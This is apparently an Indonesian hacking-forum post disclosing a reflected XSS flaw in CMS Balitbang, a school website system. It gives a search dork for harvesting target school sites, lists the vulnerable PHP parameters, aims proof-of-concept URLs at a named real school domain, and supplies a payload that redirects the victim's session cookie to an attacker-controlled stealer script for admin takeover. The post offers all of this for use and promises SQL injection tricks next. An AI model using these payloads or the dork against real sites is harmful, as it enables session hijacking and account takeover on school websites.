Bug XSS Di CMS Balitbang All Version

halo sobat injector.. kali ini akan kami bagi satu lagi bug di web berbasis cms balitbang... cekidot...:D

# Exploit Title:: bug XSS on CMS balitbang all version
# Date :: 2015-07-13
# Homepage:https ::divisidatalitbang.net
# Exploit Author:: Minato
# Dork :: site:sch.id atau bisa dikembangin lagi
==================
VULNERABLE CODE
==================
functions\fungsi_artikel.php:$kd=$_POST['kode'];
functions\agenda.php:$kode = $_GET['kode'];
functions\functions_download.php: $kode=$_GET['kode'];
functions\functions_mem.php:$kode=$_GET['kode'];
functions\fungsi_berita.php:$kd=$_GET['kode'];
dan bnyk lagy yg lainnya
# POC
http://www.sman11-smg.sch.id/html/index.php?id=artikel&kode=33'><script>alert(document.cookie)</script>
http://www.sman11-smg.sch.id/html/index.php?id=berita&kode=73'><script>alert(document.cookie)</script>
# XSS concept attacking ::GET PHPSESSID untuk menjadi admin
<script>window.location="http://www.site-attacker.com/xss-stealer.php?cookie=document.cookie";</script>
http://www.sman11-smg.sch.id/html/index.php?id=berita&kode=73'><script>window.location="http://www.site-attacker.com/xss-stealer.php?cookie=document.cookie";</script>

nantikan trik trik sqli kami selanjutnya...:D